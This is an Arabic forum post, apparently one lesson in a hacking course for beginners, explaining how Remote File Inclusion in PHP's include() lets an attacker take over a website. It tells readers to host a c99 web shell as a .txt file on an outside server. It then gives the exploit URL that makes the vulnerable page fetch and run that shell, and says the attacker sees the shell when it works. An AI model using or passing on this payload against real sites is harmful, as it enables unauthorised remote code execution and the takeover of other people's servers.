السلام عليكم ورحمة الله وبركاته
وصلنا والحمدلله لدرس الثالث في الدورة وهي
((دينامكية عمل Remote File include))
كما قلت في الدرس الثاني انه هذه الثغرة شبه منقرضه فقررت ان أشرحها كمعلومة عامة للجداد في الهكر
الثغرة اساسها خطأ في دالة
include() في لغة الـ
PHP واللي يعرف للغة بيفهم قصدي
هذه الدالة شغلتها انه تقترن ملف من الملفات مثلا
كود PHP:
www.site.com/index.php?id=main.html
هنا المبرمج يطلب من المتغير id الذي يحتويه ملف
index.php بأن يقترن محتوى ملف
main.html
ففكر بعض الهكر في طريقة لإقتران محتوى الشل الخاص بهم ليستولوا على الموقع
والطريقة هي ان ترفع شل على استضافة مجانية او مدفوعه بشرط ان يكون امتداد الملف
txt
مثلا هذا الشل
كود PHP:
http://www.c99.mobi/c99.txt
نريد ان نجعل index.php يقترنه عن طريق نفس المتغير
id
وطريقة كتابة الإستغلال هي
كود PHP:
www.site.com/index.php?id=http://www.c99.mobi/c99.txt?
مع وضع علامة الـ ؟ في نهاية رابط الشل
واذا الثغرة شغاله >>> وانا لأتوقع هذا الشيء
فسوف ترى الشل امامك واذا لم تشتغل الثغرة سترى خطأ او سيحولك الموقع الى صفحة اخرى
الى هن ننهي الشرح